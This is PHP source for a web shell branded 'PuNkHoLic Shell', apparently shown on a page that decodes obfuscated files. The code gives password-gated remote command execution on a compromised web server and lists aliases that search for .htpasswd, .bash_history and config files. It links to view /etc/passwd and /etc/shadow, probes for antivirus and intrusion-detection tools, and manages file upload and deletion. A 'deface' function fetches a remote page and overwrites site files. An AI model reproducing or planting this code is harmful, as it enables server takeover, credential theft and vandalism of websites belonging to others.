foreach ($domains as $domain) {
$user = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
echo "<tr><td>".$count++."</td><td><a href='http://".$domain."' target='_blank'>".$domain."</a></td><td>".$user['name']."</td></tr>";
}
}
printFooter();
}
if( empty($_POST['a']) )
if(isset($default_action) && function_exists('action' . $default_action))
$_POST['a'] = $default_action;
else
$_POST['a'] = 'SecInfo';
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
call_user_func('action' . $_POST['a'])
?>
Did this file decode correctly?
Original Code
<html>
<head>
<title>PuNkHoLic shell</title>
<link href="https://fonts.googleapis.com/css?family=Josefin+Sans:400,100" rel="stylesheet">
</head>
<style>
body{
font-family:Josefin Sans,sans-serif;
background:black;
color:#ABEFFF;
}
}
.loginpage{
height:400px;
width:500px;
border:1px solid;
border-color:#ABEFFF;
text-align:center;
border-radius:5px;
margin-top:100px;
}
#pageheading{
font-size:25px;
color:#ABEFFF;
margin-top:10px;
}
.loginpage img{
width:500px;
}
input{
background:black;
border-color:#ABEFFF;
border-radius:10px;
margin-top:10px;
padding:5px;
color:#ABEFFF;
}
input:hover{
background:#ABEFFF;
color:red;
}
</style>
<body>
</body>
</html>
<?php
}
exit;
}
if(!isset( $_SESSION[md5($_SERVER['HTTP_HOST'])]))
if(empty( $auth_pass )||
(isset($_POST['pass']) &&($_POST['pass']) == $auth_pass&& ($_POST['uname']) == $UserName))
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
else
printLogin();
if(strtolower(substr(PHP_OS,0,3))=="win")
$os='win';
else
$os='nix';
$safe_mode=@ini_get('safe_mode');
$disable_functions = @ini_get('disable_functions');
$home_cwd=@getcwd();
if( isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if( $os == 'win') {
$home_cwd=str_replace("\\", "/", $home_cwd);
$cwd=str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1]!= '/' )
$cwd .= '/';
if($os=='win'){
$aliases = array(
"List Directory" => "dir",
"Find index.php in current dir" => "dir /s /w /b index.php",
"Find *config*.php in current dir" => "dir /s /w /b *config*.php",
"Show active connections" => "netstat -an",
"Show running services" => "net start",
"User accounts" => "net user",
"Show computers" => "net view",
"ARP Table" => "arp -a",
"IP Configuration" => "ipconfig /all"
);
}
else{
$aliases = array(
"List dir" => "ls -la",
"list file attributes on a Linux second extended file system" => "lsattr -va",
"show opened ports" => "netstat -an | grep -i listen",
"Find" => "",
"find all suid files" => "find / -type f -perm -04000 -ls",
"find suid files in current dir" => "find . -type f -perm -04000 -ls",
"find all sgid files" => "find / -type f -perm -02000 -ls",
"find sgid files in current dir" => "find . -type f -perm -02000 -ls",
"find config.inc.php files" => "find / -type f -name config.inc.php",
"find config* files" => "find / -type f -name \"config*\"",
"find config* files in current dir" => "find . -type f -name \"config*\"",
"find all writable folders and files" => "find / -perm -2 -ls",
"find all writable folders and files in current dir" => "find . -perm -2 -ls",
"find all service.pwd files" => "find / -type f -name service.pwd",
"find service.pwd files in current dir" => "find . -type f -name service.pwd",
"find all .htpasswd files" => "find / -type f -name .htpasswd",
"find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
"find all .bash_history files" => "find / -type f -name .bash_history",
"find .bash_history files in current dir" => "find . -type f -name .bash_history",
"find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
"find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
"Locate" => "",
"locate httpd.conf files" => "locate httpd.conf",
"locate vhosts.conf files" => "locate vhosts.conf",
"locate proftpd.conf files" => "locate proftpd.conf",
"locate psybnc.conf files" => "locate psybnc.conf",
"locate my.conf files" => "locate my.conf",
"locate admin.php files" =>"locate admin.php",
"locate cfg.php files" => "locate cfg.php",
"locate conf.php files" => "locate conf.php",
"locate config.dat files" => "locate config.dat",
"locate config.php files" => "locate config.php",
"locate config.inc files" => "locate config.inc",
"locate config.inc.php" => "locate config.inc.php",
"locate config.default.php files" => "locate config.default.php",
"locate config* files " => "locate config",
"locate .conf files"=>"locate '.conf'",
"locate .pwd files" => "locate '.pwd'",
"locate .sql files" => "locate '.sql'",
"locate .htpasswd files" => "locate '.htpasswd'",
"locate .bash_history files" => "locate '.bash_history'",
"locate .mysql_history files" => "locate '.mysql_history'",
"locate .fetchmailrc files" => "locate '.fetchmailrc'",
"locate backup files" => "locate backup",
"locate dump files" => "locate dump",
"locate priv files" => "locate priv"
);
}
if(isset($_POST['p1']) && $_POST['p1']=='deface') {
$def = file_get_contents($deface_url);
file_put_contents($_POST['c'].$_POST['p2'],$def);
}
function ex($in) {
$out = '';
if ( function_exists(' exec ')) {
@exec($in,$out);
$out = @join("\n",$out);
}elseif(function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
}elseif(function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
}elseif(function_exists('shell_exec')) {
$out = shell_exec($in);
}elseif(is_resource($f = @popen($in,"r"))) {
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
return $out;
}
function which($p) {
$path = ex('which '.$p);
if(!empty($path))
return $path;
return false;
}
function printHeader() {
if(empty($_POST['charset']))
$_POST['charset'] = "UTF-8";
global $color;
global $Theme;
global $TabsColor;
echo "<html><head><link href='https://fonts.googleapis.com/css?family=Josefin+Sans:400,100' rel='stylesheet' type='text/css'></head>";
echo '<html>
<meta http-equiv="Content-Type" content="text/html; charset='.$_POST['charset'].'"><title>PuNkHoLic Shell</title>
<style>
body {background-color:black;color:#fff;}
body,td,th{ font-family: Josefin Sans, sans-serif;font-size:13px;margin:0;vertical-align:top; }
span,h1,a{ color:'.$color.' !important; }
span{ font-weight: bolder; }
h1{ padding: 0px 5px;font: 14pt audiowide;margin:0px 0 0 0px; }
div.content{ padding: 0px;margin:0 0px;background: #0F1010;border:1px solid '.$Theme.'; border-radius:5px;}
a{ text-decoration:none; }
a:hover{ border-bottom:0px solid #5e5e5e;text-decoration:none; }
a:hover{cursor: url("http://downloads.totallyfreecursors.com/cursor_files/pakistan.ani"), url("http://downloads.totallyfreecursors.com/thumbnails/PAKISTAN.gif"), auto;text-decoration:none;}
.ml1{ border:1px solid '.$Theme.';padding:px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:250px;margin-top:0px; border-radius:10px; border-color:'.$Theme.'; background:#2F2F2F;}
input, textarea, select{ margin-top:0;color:#63E1FF;background-color:black;border-radius:5px;border:1px solid '.$Theme.'; border-radis:5px;font: 10pt arial,"Courier New"; }
input[type="button"]:hover,input[type="submit"]:hover {background-color:#094F60;color:black;text-decoration:none;}
form{ margin:0px; background:#0F1010;}
#toolsTbl{ text-align:center; }
.toolsInp{ width: 80%; background:black; border-radius:5px; border-color:'.$Theme.'; }
.main th{text-align:left;background-color:'.$TabsColor.';}
.main tr:hover{background:'.$Theme.'; border:5px solid;border-color:'.$Theme.';}
.main td, th{vertical-align:middle;}
.menu { height:30px; border-radius:10px;}
.menu th{padding:1px;border-radius: 5px;background:'.$TabsColor.'; -webkit-transform: rotate(20deg);
-moz-transform: rotate(20deg);
-o-transform: rotate(20deg);
-ms-transform: rotate(20deg);
transform: rotate(20deg);}
.menu th:hover{background:#0F1010;text-decoration: none;}
pre {font-family: Josefin Sans, sans-serif;color:#FFFFFF;}
#cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
.cpr {margin-bottom:5px;font-weight:bold; }
.cpb {width:34px;margin:0 5px;}
.npoad td {padding:0;}
#PuNkHoLictools{
margin-top:50px;
width:500px;
border:1px solid;
border-radius:10px;
}
.PuNkHoLiclogo td{
font-size:12px;
font-weight:bold;
}
.PuNkHoLiclogo{
margin-left:5px;
background-repeat: no-repeat;
background-position: CENTER;
background-color:#0F1010;
background-size: 400px 120px;
}
</style>
</html>
<style type="text/css">body, a:hover {text-decoration:none;cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1054.cur), progress !important;}</style><a href="http://www.cursors-4u.com/cursor/2012/02/11/chrome-pointer.html" target="_blank" title="Chrome Pointer"><img src="http://cur.cursors-4u.net/cursor.png" border="0" alt="Chrome Pointer" style="position:absolute; top: 0px; right: 0px;" /></a>
<script>
function set(a,c,p1,p2,p3,charset) {
if(a != null)document.mf.a.value=a;
if(c != null)document.mf.c.value=c;
if(p1 != null)document.mf.p1.value=p1;
if(p2 != null)document.mf.p2.value=p2;
if(p3 != null)document.mf.p3.value=p3;
if(charset != null)document.mf.charset.value=charset;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
document.mf.submit();
}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = "ajax=true";
for(i=0;i<document.mf.elements.length;i++)
params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
sr("'.$_SERVER['REQUEST_URI'].'", params);
}
function sr(url, params) {
if (window.XMLHttpRequest) {
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open("POST", url, true);
req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
req.send(params);
}
else if (window.ActiveXObject) {
req = new ActiveXObject("Microsoft.XMLHTTP");
if (req) {
req.onreadystatechange = processReqChange;
req.open("POST", url, true);
req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
req.send(params);
}
}
}
function processReqChange() {
if( (req.readyState == 4) )
if(req.status == 200) {
//alert(req.responseText);
var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
}
else alert("Request error!");
}
</script>
<head><link href="https://fonts.googleapis.com/css?family=Audiowide" ></head><body><div style="position:absolute;width:100%;top:0;left:0;"><div style="margin:5px;background:black;"><div class="content" style="border:1px solid '.$Theme.'; border-radius:5px;">
<form method=post name=mf style="display:none;">
<input type=hidden name=a value="'.(isset($_POST['a'])?$_POST['a']:'').'">
<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
<input type=hidden name=p1 value="'.(isset($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'">
<input type=hidden name=p2 value="'.(isset($_POST['p2'])?htmlspecialchars($_POST['p2']):'').'">
<input type=hidden name=p3 value="'.(isset($_POST['p3'])?htmlspecialchars($_POST['p3']):'').'">
<input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
</form>';
$freeSpace = @diskfreespace($GLOBALS['cwd']);
$totalSpace = @disk_total_space($GLOBALS['cwd']);
$totalSpace = $totalSpace?$totalSpace:1;
$disable_functions = @ini_get('disable_functions');
$release = @php_uname('r');
$kernel = @php_uname('s');
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(@posix_geteuid());
$gid = @posix_getgrgid(@posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$cwd_links = '';
$path = explode("/", $GLOBALS['cwd']);
$n=count($path);
for($i=0;$i<$n-1;$i++) {
$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
for($j=0;$j<=$i;$j++)
$cwd_links .= $path[$j].'/';
$cwd_links .= "\")'>".$path[$i]."/</a>";
}
$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
$opt_charsets = '';
foreach($charsets as $item)
$opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
$m = array('Import Scripts'=>'ImportScripts','Jumping'=>'Jumping','Symlink'=>'Symlink','Domains' => 'Domain','Shared Hostings'=>'Shared','Sym Sites'=>'Sym','Subdomain'=>'Subdomain','Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Safe Mode'=>'Bypass','String tools'=>'StringTools','Defacer' => 'Deface','Recursive Defacer'=>'Defacer');
if(!empty($GLOBALS['auth_pass']))
$m['Logout'] = 'Logout';
$menu = '';
foreach($m as $k => $v)
$menu .= '<th><a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a></th>';
$drives = "";
if ($GLOBALS['os'] == 'win') {
foreach( range('a','z') as $drive ){
if (is_dir($drive.':\\'))
$drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
}
$drives .= '<br />: ';
}
if($GLOBALS['os'] == 'nix') {
$dominios = @file_get_contents("/etc/named.conf");
if(!$dominios) {
$DomainS = "/var/named";
$Domainonserver = scandir($DomainS);
$d0c = count($Domainonserver);
} else {
@preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
$out = sizeof(array_unique($out[1]));
$d0c = $out."Domains";
}
} else {
$d0c = "Nothing here bro:(";
}
if($GLOBALS['os'] == 'nix' )
{
$usefl = ''; $dwnldr = '';
if(!@ini_get('safe_mode')) {
$temp = array();
$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
foreach($userful as $item) { if(which($item)) $temp[]= $item; }
$usefl = implode(', ',$temp);
$temp = array();
$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
foreach($downloaders as $item2) { if(which($item2)) $temp[]= $item2; }
$dwnldr = implode(', ',$temp);
} else {
$usefl = ' ------- '; $dwnldr = ' ------- ';
}
} else {
$usefl = ' ------- '; $dwnldr = ' ------- ';
}
echo '<div class="PuNkHoLiclogo"><table class="info" cellpadding="0" cellspacing="0" width="100%"><tr>
<td><table cellpadding="3" cellspacing="0" class="npoad"><tr><td width="80px;"><span>Uname</span></td><td>: <nobr>'.substr(@php_uname(), 0, 120).'</nobr></td></tr>
<tr><td><span>User</span></td><td>: '.$uid.' ( '.$user.' ) <span>Group: </span> '.$gid.' ( '.$group.' )</td></tr><tr><td><span>Server</span></td><td>: '.@getenv('SERVER_SOFTWARE').'</td></tr><tr><td><span>Useful</span></td><td>: '.$usefl.'</td></tr><tr><td><span>Downloaders</span></td><td>: '.$dwnldr.'</td></tr><tr><td><span>D/functions</span></td><td>: '.($disable_functions?$disable_functions:'All Function Enable').'</td></tr><tr><td><span>'.($GLOBALS['os'] == 'win'?'Drives<br />Cwd':'Cwd').'</span></td><td>: '.$drives.''.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a></td></tr></table></td>'.
'<td width=4><nobr><span>Sv IP</span><br><span>Your IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>'.
'<td><nobr>: '.gethostbyname($_SERVER["HTTP_HOST"]).'<br>: '.$_SERVER['REMOTE_ADDR'].'<br />: '.viewSize($totalSpace).'<br />: '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>: '.@phpversion().' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a><br />: '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color='.$color.'<b>OFF</b></font>').'<br />: '.$d0c.'</nobr></td></tr></table></div>'.
'</div></div><div style="margin:5;background:black;"><div class="content" style="border-top:5px solid 430303;padding:2px;"><table cellpadding="3" cellspacing="0" width="100%" class="menu"><tr>'.$menu.'</tr></table></div></div><div style="margin:5;background:black;">';
}
function printFooter() {
$is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
echo '</div><div style="margin:5px;background:black;"><div class="content" style="border:1px solid '.$Theme.'; border-radius:5px;">
<table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%">
<tr>
<td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="'.htmlspecialchars($GLOBALS['cwd']).'"><input type=submit value=">>"></form></td>
<td><form onsubmit="g(\'FilesTools\',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
</tr>
<tr>
<td><form onsubmit="g(\'FilesMan\',null,\'mkdir\',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form>'.$is_writable.'</td>
<td><form onsubmit="g(\'FilesTools\',null,this.f.value,\'mkfile\');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form>'.$is_writable.'</td>
</tr>
<tr>
<td><form onsubmit="g(\'Console\',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
<td><form method="post" ENCTYPE="multipart/form-data">
<input type=hidden name=a value="FilesMAn">
<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
<input type=hidden name=p1 value="uploadFile">
<input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
<span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form>'.$is_writable.'</td>
</tr>
</table></div></div>
<div style="margin:5px;background:black;"><div class="content" style="border:2px solid '.$Theme.';text-align:center;font-weight:bold; border-radius:10px;margin:auto; width:500;">PuNkHoLic Shell coded by <a href="https://www.facebook.com/niraj.ghimire.5454"> PuNkHoLic</a></div></div>
</div>
</body></html>';
}
if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
function viewSize($s) {
if($s >= 1073741824)
return sprintf('%1.2f', $s / 1073741824 ). ' GB';
elseif($s >= 1048576)
return sprintf('%1.2f', $s / 1048576 ) . ' MB';
elseif($s >= 1024)
return sprintf('%1.2f', $s / 1024 ) . ' KB';
else
return $s . ' B';
}
function perms($p) {
if (($p & 0xC000) == 0xC000)$i = 's';
elseif (($p & 0xA000) == 0xA000)$i = 'l';
elseif (($p & 0x8000) == 0x8000)$i = '-';
elseif (($p & 0x6000) == 0x6000)$i = 'b';
elseif (($p & 0x4000) == 0x4000)$i = 'd';
elseif (($p & 0x2000) == 0x2000)$i = 'c';
elseif (($p & 0x1000) == 0x1000)$i = 'p';
else $i = 'u';
$i .= (($p & 0x0100) ? 'r' : '-');
$i .= (($p & 0x0080) ? 'w' : '-');
$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
$i .= (($p & 0x0020) ? 'r' : '-');
$i .= (($p & 0x0010) ? 'w' : '-');
$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
$i .= (($p & 0x0004) ? 'r' : '-');
$i .= (($p & 0x0002) ? 'w' : '-');
$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
return $i;
}
function viewPermsColor($f) {
if (!@is_readable($f))
return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
elseif (!@is_writable($f))
return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
else
return '<font color=#00BB00><b>'.perms(@fileperms($f)).'</b></font>';
}
if(!function_exists("scandir")) {
function scandir($dir) {
$dh= opendir($dir);
while (false !== ($filename = readdir($dh))) {
$files[] = $filename;
}
return $files;
}
}
function actionSecInfo() {
printHeader();
echo '<h1>Server security information</h1><div class=content>';
function showSecParam($n, $v) {
$v = trim($v);
if($v) {
echo '<span>'.$n.': </span>';
if(strpos($v, "\n") === false)
echo $v.'<br>';
else
echo '<pre class=ml1>'.$v.'</pre>';
}
}
showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
showSecParam('Open base dir', @ini_get('open_basedir'));
showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
$temp=array();
if(function_exists('mysql_get_client_info'))
$temp[] = "MySql (".mysql_get_client_info().")";
if(function_exists('mssql_connect'))
$temp[] = "MSSQL";
if(function_exists('pg_connect'))
$temp[] = "PostgreSQL";
if(function_exists('oci_connect'))
$temp[] = "Oracle";
showSecParam('Supported databases', implode(', ', $temp));
echo '<br>';
if( $GLOBALS['os'] == 'nix' ) {
$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
showSecParam('OS version', @file_get_contents('/proc/version'));
showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
if(!$GLOBALS['safe_mode']) {
echo '<br>';
$temp=array();
foreach ($userful as $item)
if(which($item)){$temp[]=$item;}
showSecParam('Userful', implode(', ',$temp));
$temp=array();
foreach ($danger as $item)
if(which($item)){$temp[]=$item;}
showSecParam('Danger', implode(', ',$temp));
$temp=array();
foreach ($downloaders as $item)
if(which($item)){$temp[]=$item;}
showSecParam('Downloaders', implode(', ',$temp));
echo '<br/>';
showSecParam('Hosts', @file_get_contents('/etc/hosts'));
showSecParam('HDD space', ex('df -h'));
showSecParam('Mount options', @file_get_contents('/etc/fstab'));
}
} else {
showSecParam('OS Version',ex('ver'));
showSecParam('Account Settings',ex('net accounts'));
showSecParam('User Accounts',ex('net user'));
}
echo '</div>';
printFooter();
}
function actionFilesMan() {
printHeader();
echo '<h1>File manager</h1><div class=content>';
if(isset($_POST['p1']) && $_POST['p1']!='deface') {
switch($_POST['p1']) {
case 'uploadFile':
if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
echo "Can't upload file!";
break;
break;
case 'mkdir':
if(!@mkdir($_POST['p2']))
echo "Can't create new dir";
break;
case 'delete':
function deleteDir($path) {
$path = (substr($path,-1)=='/') ? $path:$path.'/';
$dh= opendir($path);
while ( ($item = readdir($dh) ) !== false) {
$item = $path.$item;
if ( (basename($item) == "..") || (basename($item) == ".") )
continue;
$type = filetype($item);
if ($type == "dir")
deleteDir($item);
else
@unlink($item);
}
closedir($dh);
rmdir($path);
}
if(is_array(@$_POST['f']))
foreach($_POST['f'] as $f) {
$f = urldecode($f);
if(is_dir($f))
deleteDir($f);
else
@unlink($f);
}
break;
case 'paste':
if($_SESSION['act'] == 'copy') {
function copy_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h = opendir($c.$s);
while (($f = readdir($h)) !== false)
if (($f != ".") and ($f != "..")) {
copy_paste($c.$s.'/',$f, $d.$s.'/');
}
} elseif(is_file($c.$s)) {
@copy($c.$s, $d.$s);
}
}
foreach($_SESSION['f'] as $f)
copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
} elseif($_SESSION['act'] == 'move') {
function move_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h = opendir($c.$s);
while (($f = readdir($h)) !== false)
if (($f != ".") and ($f != "..")) {
copy_paste($c.$s.'/',$f, $d.$s.'/');
}
} elseif(is_file($c.$s)) {
@copy($c.$s, $d.$s);
}
}
foreach($_SESSION['f'] as $f)
@rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
}
unset($_SESSION['f']);
break;
default:
if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
$_SESSION['act'] = @$_POST['p1'];
$_SESSION['f'] = @$_POST['f'];
foreach($_SESSION['f'] as $k => $f)
$_SESSION['f'][$k] = urldecode($f);
$_SESSION['cwd'] = @$_POST['c'];
}
break;
}
echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
}
$dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
if($dirContent === false) {echo 'Can\'t open this folder!'; return;}
global $sort;
$sort = array('name', 1);
if(!empty($_POST['p1'])) {
if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
$sort = array($match[1], (int)$match[2]);
}
echo '<script>
function sa() {
for(i=0;i<document.files.elements.length;i++)
if(document.files.elements[i].type == \'checkbox\')
document.files.elements[i].checked = document.files.elements[0].checked;
}
</script>
<table width=\'100%\' class=\'main\' cellspacing=\'0\' cellpadding=\'2\'>
<form name=files method=post>';
echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
$dirs = $files = $links = array();
$n = count($dirContent);
for($i=0;$i<$n;$i++) {
$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
$tmp = array('name' => $dirContent[$i],
'path' => $GLOBALS['cwd'].$dirContent[$i],
'modify' => @date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
);
if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
$files[] = array_merge($tmp, array('type' => 'file'));
elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
$links[] = array_merge($tmp, array('type' => 'link'));
elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
$dirs[] = array_merge($tmp, array('type' => 'dir'));
}
$GLOBALS['sort'] = $sort;
function cmp($a, $b) {
if($GLOBALS['sort'][0] != 'size')
return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
else
return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
}
usort($files, "cmp");
usort($dirs, "cmp");
usort($links, "cmp");
$files = array_merge($dirs, $links, $files);
$l = 0;
foreach($files as $f) {
echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
.'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
$l = $l?0:1;
}
echo '<tr><td colspan=5>
<input type=hidden name=a value=\'FilesMan\'>
<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
<input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
<select name=\'p1\'><option value=\'copy\'>Copy</option><option value=\'move\'>Move</option><option value=\'delete\'>Delete</option>';
if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){echo '<option value=\'paste\'>Paste</option>'; }
echo '</select> <input type="submit" value=">>"></td><td colspan="2" align="right" width="1"><input name="def" id="def" value="index.php" size="10"/> <input type="button" onclick="g(\'FilesMan\',\''.htmlspecialchars($GLOBALS['cwd']).'\',\'deface\',document.getElementById(\'def\').value)" value="Add your Deface"></td></tr>
</form></table></div>';
printFooter();
}
function actionStringTools() {
if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}}
